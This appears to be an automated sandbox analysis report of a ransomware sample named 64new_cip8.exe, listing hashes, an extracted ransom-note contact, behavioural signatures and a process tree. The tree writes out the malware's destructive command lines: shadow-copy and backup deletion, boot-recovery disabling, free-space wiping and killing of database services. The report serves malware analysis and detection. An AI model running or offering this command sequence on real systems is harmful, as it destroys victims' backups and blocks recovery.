Resubmissions
29-11-2022 11:01
Analysis ID: 221129-m4n2rafd8v
Score: 10
Analysis
max time kernel: 145s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 29-11-2022 11:01
Static task: static1
Behavioral task: behavioral1
  Sample: 64new_cip8.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: 64new_cip8.exe
  Resource: win10v2004-20220812-en
General
Target: 64new_cip8.exe
Size: 309KB
MD5: 681ba901bb6deb49ecdc83c9e5dcc548
SHA1: 5553534db3d538adab933a74e1399357616cfe4f
SHA256: c66ba850b29e7d9302621a209882a0f86bdd158faba936c7a045d82c3669bcd0
SHA512: 5d0d01b68f82e96e5d872043d9274b16f4b83a7998136deb20c1d4c2e4c5be298cc786e4ae17ad7b587538ec963cc70443836a60132c000f010beb69d008fb50
SSDEEP: 6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l003WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++38aw7c
Malware Config
Extracted
Ransom note path: \??\A:\!-Recovery_Instructions-!.html
Email: Mikesupp77@outlook.com
URL: https://tox.chat/download.html
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes: 64new_cip8.exe
  description           | pid  | process        | target process
  PID 1568 created 2616 | 1568 | 64new_cip8.exe | Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: bcdedit.exe, bcdedit.exe
  pid  | process
  224  | bcdedit.exe
  4296 | bcdedit.exe

Processes: wbadmin.exe, wbadmin.exe
  pid  | process
  4688 | wbadmin.exe
  3324 | wbadmin.exe

Processes: wbadmin.exe
  pid  | process
  4384 | wbadmin.exe
Modifies Installed Components in the registry (2 TTPs, 1 IoC)
Processes: explorer.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Active Setup\Installed Components | explorer.exe
Modifies extensions of user files (5 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: 64new_cip8.exe
  description                  | ioc | process
  File renamed                 | C:\Users\Admin\Pictures\ConvertFromRedo.crw => C:\Users\Admin\Pictures\ConvertFromRedo.crw.cipher8 | 64new_cip8.exe
  File opened for modification | C:\Users\Admin\Pictures\ImportRedo.tiff | 64new_cip8.exe
  File renamed                 | C:\Users\Admin\Pictures\ImportRedo.tiff => C:\Users\Admin\Pictures\ImportRedo.tiff.cipher8 | 64new_cip8.exe
  File renamed                 | C:\Users\Admin\Pictures\UnregisterGroup.tif => C:\Users\Admin\Pictures\UnregisterGroup.tif.cipher8 | 64new_cip8.exe
  File renamed                 | C:\Users\Admin\Pictures\ConfirmPush.tif => C:\Users\Admin\Pictures\ConfirmPush.tif.cipher8 | 64new_cip8.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: 64new_cip8.exe
  description             | ioc    | process
  File opened (read-only) | \??\B: | 64new_cip8.exe
  File opened (read-only) | \??\G: | 64new_cip8.exe
  File opened (read-only) | \??\J: | 64new_cip8.exe
  File opened (read-only) | \??\L: | 64new_cip8.exe
  File opened (read-only) | \??\T: | 64new_cip8.exe
  File opened (read-only) | \??\W: | 64new_cip8.exe
  File opened (read-only) | \??\X: | 64new_cip8.exe
  File opened (read-only) | \??\S: | 64new_cip8.exe
  File opened (read-only) | \??\U: | 64new_cip8.exe
  File opened (read-only) | \??\F: | 64new_cip8.exe
  File opened (read-only) | \??\H: | 64new_cip8.exe
  File opened (read-only) | \??\I: | 64new_cip8.exe
  File opened (read-only) | \??\M: | 64new_cip8.exe
  File opened (read-only) | \??\P: | 64new_cip8.exe
  File opened (read-only) | \??\R: | 64new_cip8.exe
  File opened (read-only) | \??\V: | 64new_cip8.exe
  File opened (read-only) | \??\Z: | 64new_cip8.exe
  File opened (read-only) | \??\Y: | 64new_cip8.exe
  File opened (read-only) | \??\A: | 64new_cip8.exe
  File opened (read-only) | \??\E: | 64new_cip8.exe
  File opened (read-only) | \??\K: | 64new_cip8.exe
  File opened (read-only) | \??\N: | 64new_cip8.exe
  File opened (read-only) | \??\O: | 64new_cip8.exe
  File opened (read-only) | \??\Q: | 64new_cip8.exe
Drops file in Windows directory (3 IoCs)
Processes: wbadmin.exe
  description                  | ioc                                           | process
  File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | wbadmin.exe
  File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | wbadmin.exe
  File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | wbadmin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (2 IoCs)
Processes: WerFault.exe, WerFault.exe
  pid  | pid_target | process      | target process
  1792 | 2616       | WerFault.exe | Explorer.EXE
  440  | 4020       | WerFault.exe |
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe
  pid  | process
  2680 | vssadmin.exe
Kills process with taskkill (16 IoCs)
Processes: taskkill.exe (16 instances)
  pid  | process
  4892 | taskkill.exe
  4460 | taskkill.exe
  3428 | taskkill.exe
  608  | taskkill.exe
  5072 | taskkill.exe
  3104 | taskkill.exe
  3588 | taskkill.exe
  2860 | taskkill.exe
  2784 | taskkill.exe
  2044 | taskkill.exe
  5092 | taskkill.exe
  4748 | taskkill.exe
  604  | taskkill.exe
  220  | taskkill.exe
  4072 | taskkill.exe
  860  | taskkill.exe
Modifies registry class (2 IoCs)
Processes: explorer.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{AFF1FE51-F87C-449A-A316-9872D9D800F6} | explorer.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | explorer.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: 64new_cip8.exe
  pid  | process        | occurrences
  1568 | 64new_cip8.exe | 64 (the same row is repeated 64 times in the report)
Suspicious use of AdjustPrivilegeToken (47 IoCs)
Processes: taskkill.exe (16 instances), vssvc.exe, WMIC.exe, wbengine.exe, explorer.exe
  description                         | pid  | process
  Token: SeDebugPrivilege             | 4748 | taskkill.exe
  Token: SeDebugPrivilege             | 4892 | taskkill.exe
  Token: SeDebugPrivilege             | 2044 | taskkill.exe
  Token: SeDebugPrivilege             | 604  | taskkill.exe
  Token: SeDebugPrivilege             | 220  | taskkill.exe
  Token: SeDebugPrivilege             | 4072 | taskkill.exe
  Token: SeDebugPrivilege             | 4460 | taskkill.exe
  Token: SeDebugPrivilege             | 5072 | taskkill.exe
  Token: SeDebugPrivilege             | 3104 | taskkill.exe
  Token: SeDebugPrivilege             | 860  | taskkill.exe
  Token: SeDebugPrivilege             | 3588 | taskkill.exe
  Token: SeDebugPrivilege             | 3428 | taskkill.exe
  Token: SeDebugPrivilege             | 2860 | taskkill.exe
  Token: SeDebugPrivilege             | 5092 | taskkill.exe
  Token: SeDebugPrivilege             | 608  | taskkill.exe
  Token: SeDebugPrivilege             | 2784 | taskkill.exe
  Token: SeBackupPrivilege            | 2008 | vssvc.exe
  Token: SeRestorePrivilege           | 2008 | vssvc.exe
  Token: SeAuditPrivilege             | 2008 | vssvc.exe
  Token: SeIncreaseQuotaPrivilege     | 400  | WMIC.exe
  Token: SeSecurityPrivilege          | 400  | WMIC.exe
  Token: SeTakeOwnershipPrivilege     | 400  | WMIC.exe
  Token: SeLoadDriverPrivilege        | 400  | WMIC.exe
  Token: SeSystemProfilePrivilege     | 400  | WMIC.exe
  Token: SeSystemtimePrivilege        | 400  | WMIC.exe
  Token: SeProfSingleProcessPrivilege | 400  | WMIC.exe
  Token: SeIncBasePriorityPrivilege   | 400  | WMIC.exe
  Token: SeCreatePagefilePrivilege    | 400  | WMIC.exe
  Token: SeBackupPrivilege            | 400  | WMIC.exe
  Token: SeRestorePrivilege           | 400  | WMIC.exe
  Token: SeShutdownPrivilege          | 400  | WMIC.exe
  Token: SeDebugPrivilege             | 400  | WMIC.exe
  Token: SeSystemEnvironmentPrivilege | 400  | WMIC.exe
  Token: SeRemoteShutdownPrivilege    | 400  | WMIC.exe
  Token: SeUndockPrivilege            | 400  | WMIC.exe
  Token: SeManageVolumePrivilege      | 400  | WMIC.exe
  Token: 33                           | 400  | WMIC.exe
  Token: 34                           | 400  | WMIC.exe
  Token: 35                           | 400  | WMIC.exe
  Token: 36                           | 400  | WMIC.exe
  Token: SeBackupPrivilege            | 4692 | wbengine.exe
  Token: SeRestorePrivilege           | 4692 | wbengine.exe
  Token: SeSecurityPrivilege          | 4692 | wbengine.exe
  Token: SeShutdownPrivilege          | 512  | explorer.exe
  Token: SeCreatePagefilePrivilege    | 512  | explorer.exe
  Token: SeShutdownPrivilege          | 512  | explorer.exe
  Token: SeCreatePagefilePrivilege    | 512  | explorer.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: explorer.exe
  pid | process
  512 | explorer.exe
  512 | explorer.exe
Suspicious use of SendNotifyMessage (2 IoCs)
Processes: explorer.exe
  pid | process
  512 | explorer.exe
  512 | explorer.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 64new_cip8.exe, cmd.exe (17 instances)
  description                      | pid  | process        | target process | times listed
  PID 1568 wrote to memory of 4200 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 4200 wrote to memory of 2084 | 4200 | cmd.exe        | cmd.exe        | 2
  PID 1568 wrote to memory of 3932 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 3932 wrote to memory of 1528 | 3932 | cmd.exe        | cmd.exe        | 2
  PID 1528 wrote to memory of 4748 | 1528 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 4724 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 4724 wrote to memory of 3760 | 4724 | cmd.exe        | cmd.exe        | 2
  PID 3760 wrote to memory of 4892 | 3760 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 4160 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 4160 wrote to memory of 1324 | 4160 | cmd.exe        | cmd.exe        | 2
  PID 1324 wrote to memory of 2044 | 1324 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 664  | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 664 wrote to memory of 2016  | 664  | cmd.exe        | cmd.exe        | 2
  PID 2016 wrote to memory of 604  | 2016 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 1644 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 1644 wrote to memory of 240  | 1644 | cmd.exe        | cmd.exe        | 2
  PID 240 wrote to memory of 220   | 240  | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 2644 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 2644 wrote to memory of 4240 | 2644 | cmd.exe        | cmd.exe        | 2
  PID 4240 wrote to memory of 4072 | 4240 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 1844 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 1844 wrote to memory of 3840 | 1844 | cmd.exe        | cmd.exe        | 2
  PID 3840 wrote to memory of 4460 | 3840 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 2176 | 1568 | 64new_cip8.exe | cmd.exe        | 3
  PID 2176 wrote to memory of 2156 | 2176 | cmd.exe        | cmd.exe        | 2
  PID 2156 wrote to memory of 5072 | 2156 | cmd.exe        | taskkill.exe   | 2
  PID 1568 wrote to memory of 3440 | 1568 | 64new_cip8.exe | cmd.exe        | 3
System policy modification (1 TTP, 4 IoCs)
Processes: 64new_cip8.exe, 64new_cip8.exe
  description     | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 64new_cip8.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 64new_cip8.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 64new_cip8.exe
  Key created     | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 64new_cip8.exe
Processes
(tree depth in brackets; each entry gives the image path, the command line, and the signatures triggered by that process)

[1] C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE
  [2] C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Modifies extensions of user files
      - Enumerates connected drives
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - System policy modification
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im sqlbrowser.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im sqlwriter.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im sqlservr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im msmdsrv.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im MsDtsSrvr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im sqlceip.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im fdlauncher.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im Ssms.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im SQLAGENT.EXE
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im fdhost.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im sqlservr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im ReportingServicesService.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im msftesql.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im pg_ctl.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe
        [5] C:\Windows\system32\taskkill.exe
            cmdline: taskkill -f -im postgres.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        [5] C:\Windows\system32\net.exe
            cmdline: net stop MSSQLServerADHelper100
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        [5] C:\Windows\system32\net.exe
            cmdline: net stop MSSQL$ISARS
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop MSSQL$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        [5] C:\Windows\system32\net.exe
            cmdline: net stop MSSQL$MSFW
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop MSSQL$MSFW
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        [5] C:\Windows\system32\net.exe
            cmdline: net stop SQLAgent$ISARS
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLAgent$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        [5] C:\Windows\system32\net.exe
            cmdline: net stop SQLAgent$MSFW
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLAgent$MSFW
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        [5] C:\Windows\system32\net.exe
            cmdline: net stop SQLBrowser
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS
        [5] C:\Windows\system32\net.exe
            cmdline: net stop ReportServer$ISARS
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop ReportServer$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        [5] C:\Windows\system32\net.exe
            cmdline: net stop SQLWriter
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 stop SQLWriter
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        [5] C:\Windows\system32\vssadmin.exe
            cmdline: vssadmin.exe Delete Shadows /All /Quiet
            - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
        [5] C:\Windows\system32\wbadmin.exe
            cmdline: wbadmin delete backup -keepVersions:0 -quiet
            - Deletes system backups
            - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
        [5] C:\Windows\system32\wbadmin.exe
            cmdline: wbadmin DELETE SYSTEMSTATEBACKUP
            - Deletes System State backups
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic.exe SHADOWCOPY /nointeractive
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
        [5] C:\Windows\system32\bcdedit.exe
            cmdline: bcdedit.exe /set {default} recoveryenabled No
            - Modifies boot configuration data using bcdedit
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      [4] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        [5] C:\Windows\system32\bcdedit.exe
            cmdline: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
            - Modifies boot configuration data using bcdedit
    [3] C:\Windows\SysWOW64\cipher.exe
        cmdline: cipher /w:\\?\C:
  [2] C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe
      cmdline: \\?\C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe -network
      - System policy modification
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c pause
  [2] C:\Windows\system32\WerFault.exe
      cmdline: C:\Windows\system32\WerFault.exe -u -p 2616 -s 3484
      - Program crash
[1] C:\Windows\system32\taskkill.exe
    cmdline: taskkill -f -im fdlauncher.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\net1.exe
    cmdline: C:\Windows\system32\net1 stop SQLBrowser
[1] C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 408 -p 2616 -ip 2616
[1] C:\Windows\system32\vssvc.exe
    cmdline: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  [2] C:\Windows\system32\wbadmin.exe
      cmdline: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      - Deletes System State backups
[1] C:\Windows\system32\wbengine.exe
    cmdline: "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\vdsldr.exe
    cmdline: C:\Windows\System32\vdsldr.exe -Embedding
[1] C:\Windows\System32\vds.exe
    cmdline: C:\Windows\System32\vds.exe
[1] C:\Windows\explorer.exe
